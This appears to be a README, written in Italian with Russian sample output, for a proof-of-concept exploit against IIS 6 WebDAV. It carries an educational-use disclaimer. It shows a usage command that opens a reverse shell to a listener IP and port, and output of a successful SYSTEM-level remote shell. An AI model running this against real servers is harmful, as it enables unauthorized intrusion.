
è uno strumento PoC che dimostra un exploit per una vulnerabilità nota nel componente WebDAV di IIS6
GenWebDavIISExploit è uno strumento PoC che dimostra un exploit per una vulnerabilità nota nel componente WebDAV di IIS6. Questo strumento è progettato per scopi educativi e di ricerca, per mostrare come la vulnerabilità possa essere sfruttata per eseguire codice arbitrario su un server remoto.
Questo progetto è destinato solo a scopi educativi. Usa questo strumento in modo responsabile e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'accesso non autorizzato a sistemi informatici è illegale.
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1